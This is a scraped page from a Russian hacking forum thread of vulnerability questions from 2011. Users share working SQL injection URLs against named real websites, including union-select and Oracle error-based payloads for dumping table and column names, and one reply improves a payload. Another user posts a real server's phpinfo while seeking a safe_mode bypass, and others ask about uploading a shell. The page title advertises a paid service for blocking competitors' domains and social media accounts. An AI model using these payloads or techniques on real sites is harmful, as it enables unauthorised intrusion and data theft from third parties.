УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1687 из 2438

1687

Опции темы

Поиск в этой теме

Опции просмотра

#16861

05.05.2011, 23:01

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Цитата:

Сообщение от qaz

qaz said:
как вывести названия таблиц?
http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+i nformation_schema.tables%20where%201=%27

Код:

Code:
http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+--+

Используй substring(group_concat(...),200) для просмотра остальных таблиц, увеличивая число 200 будешь смотреть дальше))

#16862

05.05.2011, 23:04

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

Обход ограничений php safe_mod.

Задался целью обойти safe_mod.

PHP Version 5.1.6

информация из phpinfo()

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
System     Linux u[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru 2.6.9[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]100.ELsmp[/COLOR][COLOR="#FF8000"]#1 SMP Tue Feb 1 12:17:32 EST 2011 i686 

[/COLOR][COLOR="#0000BB"]Build Date     Sep 29 2007 03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40 

Configure Command[/COLOR][COLOR="#DD0000"]'./configure' '--host=i686-redhat-linux-gnu' '--build=i686-redhat-linux-gnu' '--target=i386-redhat-linux' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/usr/com' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-curl' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-png' '--with-pspell' '--with-expat-dir=/usr' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' '--enable-yp' '--enable-wddx' '--with-kerberos' '--enable-ucd-snmp-hack' '--with-unixODBC=shared,/usr' '--enable-memory-limit' '--enable-shmop' '--enable-calendar' '--enable-dbx' '--enable-dio' '--with-mime-magic=/etc/httpd/conf/magic' '--without-sqlite' '--with-libxml-dir=/usr' '--with-mcrypt' '--with-xml' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--without-odbc' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable-

pdo' '--disable-xmlreader' '--disable-xmlwriter' 

[/COLOR][COLOR="#0000BB"]Server API     Apache 2.0 Handler 

Virtual Directory Support     disabled 

Configuration File[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini 

Scan this dir[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]additional[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini files[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d 

additional[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini files parsed[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]bcmath[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]dba[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]dom[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gd[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]imap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ldap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mbstring[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mysqli[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ncurses[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]odbc[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdo[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdo_mysql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdo_odbc[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdo_pgsql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pdo_sqlite[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]pgsql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]snmp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]soap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sqlite[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]xmlreader[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]xmlrpc[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]xmlwriter[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini[/COLOR][COLOR="#007700"], /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]xsl[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ini 

PHP API     20041225 

PHP Extension     20050922 

Zend Extension     220051025 

Debug Build     no 

Thread Safety     disabled 

Zend Memory Manager     enabled 

IPv6 Support     enabled 

Registered PHP Streams     php[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ftp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]compress[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bzip2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]compress[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]zlib[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ftps 

Registered Stream Socket Transports     tcp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]udp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]unix[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]udg[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ssl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sslv3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sslv2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tls 

Registered Stream Filters     string[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]rot13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]string[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]toupper[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]string[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tolower[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]string[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]convert[/COLOR][COLOR="#007700"].*,[/COLOR][COLOR="#0000BB"]consumed[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]convert[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]iconv[/COLOR][COLOR="#007700"].*,[/COLOR][COLOR="#0000BB"]bzip2[/COLOR][COLOR="#007700"].*,[/COLOR][COLOR="#0000BB"]zlib[/COLOR][COLOR="#007700"].* 

[/COLOR][COLOR="#0000BB"]PHP Credits

Configuration

PHP CoreDirective    Local Value    Master Value

allow_call_time_pass_reference    Off    Off

allow_url_fopen    On    On

always_populate_raw_post_data    Off    Off

arg_separator[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]input[/COLOR][COLOR="#007700"]&    &

[/COLOR][COLOR="#0000BB"]arg_separator[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]output[/COLOR][COLOR="#007700"]&    &

[/COLOR][COLOR="#0000BB"]asp_tags    Off    Off

auto_append_file    no value    no value

auto_globals_jit    On    On

auto_prepend_file    no value    no value

browscap    no value    no value

default_charset    no value    no value

default_mimetype    text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html    text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html

define_syslog_variables    Off    Off

disable_classes    no value    no value

disable_functions    ini_restore    ini_restore

display_errors    On    On

display_startup_errors    Off    Off

doc_root    no value    no value

docref_ext    no value    no value

docref_root    no value    no value

enable_dl    On    On

error_append_string    no value    no value

error_log    no value    no value

error_prepend_string    no value    no value

error_reporting    0    2037

expose_php    On    On

extension_dir[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]modules[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]modules

file_uploads    On    On

highlight[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bg[/COLOR][COLOR="#FF8000"]#FFFFFF    #FFFFFF

[/COLOR][COLOR="#0000BB"]highlight[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]comment[/COLOR][COLOR="#FF8000"]#FF8000    #FF8000

[/COLOR][COLOR="#0000BB"]highlight[/COLOR][COLOR="#007700"].default[/COLOR][COLOR="#FF8000"]#0000BB    #0000BB

[/COLOR][COLOR="#0000BB"]highlight[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#FF8000"]#000000    #000000

[/COLOR][COLOR="#0000BB"]highlight[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]keyword[/COLOR][COLOR="#FF8000"]#007700    #007700

[/COLOR][COLOR="#0000BB"]highlight[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]string[/COLOR][COLOR="#FF8000"]#DD0000    #DD0000

[/COLOR][COLOR="#0000BB"]html_errors    On    On

ignore_repeated_errors    Off    Off

ignore_repeated_source    Off    Off

ignore_user_abort    On    Off

implicit_flush    Off    Off

include_path[/COLOR][COLOR="#007700"].    .

[/COLOR][COLOR="#0000BB"]log_errors    Off    Off

log_errors_max_len    1024    1024

magic_quotes_gpc    Off    Off

magic_quotes_runtime    Off    Off

magic_quotes_sybase    Off    Off

mail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]force_extra_parameters    no value    no value

max_execution_time    60    60

max_input_nesting_level    64    64

max_input_time    60    60

memory_limit    64M    64M

open_basedir[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/.[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]httpdocs[/COLOR][COLOR="#007700"]:/[/COLOR][COLOR="#0000BB"]tmp    no value

output_buffering    4096    4096

output_handler    no value    no value

post_max_size    64M    64M

precision    14    14

realpath_cache_size    16K    16K

realpath_cache_ttl    120    120

register_argc_argv    Off    Off

register_globals    On    Off

register_long_arrays    On    Off

report_memleaks    On    On

report_zend_debug    On    On

safe_mode    On    Off

safe_mode_exec_dir    no value    no value

safe_mode_gid    Off    Off

safe_mode_include_dir    no value    no value

sendmail_from    no value    no value

sendmail_path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sbin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sendmail[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]t[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sbin[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sendmail[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]t[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]i

serialize_precision    100    100

short_open_tag    On    On

SMTP    localhost    localhost

smtp_port    25    25

sql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]safe_mode    Off    Off

track_errors    Off    Off

unserialize_callback_func    no value    no value

upload_max_filesize    64M    64M

upload_tmp_dir    no value    no value

user_dir    no value    no value

variables_order    EGPCS    EGPCS

xmlrpc_error_number    0    0

xmlrpc_errors    Off    Off

y2k_compliance    On    On

zend[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ze1_compatibility_mode    Off    Off

apache2handlerApache Version     Apache[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2.0.52[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Red Hat[/COLOR][COLOR="#007700"]) 

[/COLOR][COLOR="#0000BB"]Apache API Version     20020903 

Server Administrator     vlad[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]siteholder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru 

Hostname[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Port     altpark[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]80 

User[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Group     apache[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]48[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]48 

Max Requests     Per Child[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2000[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Keep Alive[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]on[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Max Per Connection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]300 

Timeouts     Connection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Keep[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Alive[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15 

Virtual Server     Yes 

Server Root[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]httpd 

Loaded Modules     core prefork http_core mod_so mod_access mod_auth mod_auth_anon mod_auth_digest mod_include mod_log_config mod_env mod_expires mod_deflate mod_headers mod_usertrack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_userdir mod_alias mod_rewrite mod_cache mod_suexec mod_disk_cache mod_file_cache mod_mem_cache mod_cgi mod_fpcgid mod_jk mod_bw mod_fcgid mod_perl mod_php5 mod_ssl 

[/COLOR][/COLOR]

Возможности залить .httpacces нет.

часть фаилов читается posix методом.

из того что нашел работает только творение от крыса которое позволяет листать дериктории и смотреть какие в них есть фаилы, но отображаются не все.

#16863

06.05.2011, 01:00

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
Возможности залить .httpacces нет.
.

что это такое? Оо

#16864

06.05.2011, 01:24

Fldr

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от eclipse

eclipse said:
если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь
ищу у хостера
Например для всех сайтов на hc.ru можно зайти в базу так
phpmyadmin.hc.ru

Ну на наших сайтах , проблемы найти пхпмайадмин нету.

А вот на забугорных , 1 к 30 что найду... В этом вся и проблема (

#16865

06.05.2011, 01:48

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

Konqi.

Я htaccess имел в виду разумеется)

#16866

06.05.2011, 20:44

LiRvD082

Новичок

Регистрация: 04.10.2009

Сообщений: 1

Провел на форуме:
14740

Репутация: 0

Всем привет!!!

Есть скуля вида

Цитата:

Сообщение от None

http://locakhost/site.php?page=1')+(select+upper(xmltype(chr(60)||c hr(58)||ch r(58)||(select+rawtohex(column_name)from(select+co lumn_name,rownum+rnum+from+sys.USER_TAB_COLUMNS+a) where+rnum=1)||chr(58)||chr(58)||chr(62)))from dual)--+

Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)

#16867

06.05.2011, 20:51

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Цитата:

Сообщение от LiRvD082

LiRvD082 said:
Всем привет!!!
Есть скуля вида
Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)

Если кавычка фильтруется - нет, если нет - да

#16868

07.05.2011, 15:03

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

что то вобще не понимаю как подступиться к скули...посоветуйте плыз

http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--

#16869

07.05.2011, 15:25

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Там многие спецсимволы экранируются, в том числе и скобки. Поэтому вряд ли что выйдет со скулей.

#16870

07.05.2011, 15:37

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от jecka3000

jecka3000 said:
что то вобще не понимаю как подступиться к скули...посоветуйте плыз
http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--

http://www.bronx.nl/shop/category.php?cat_id=1+group+by+130--+

Страница 1687 из 2438

1687

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход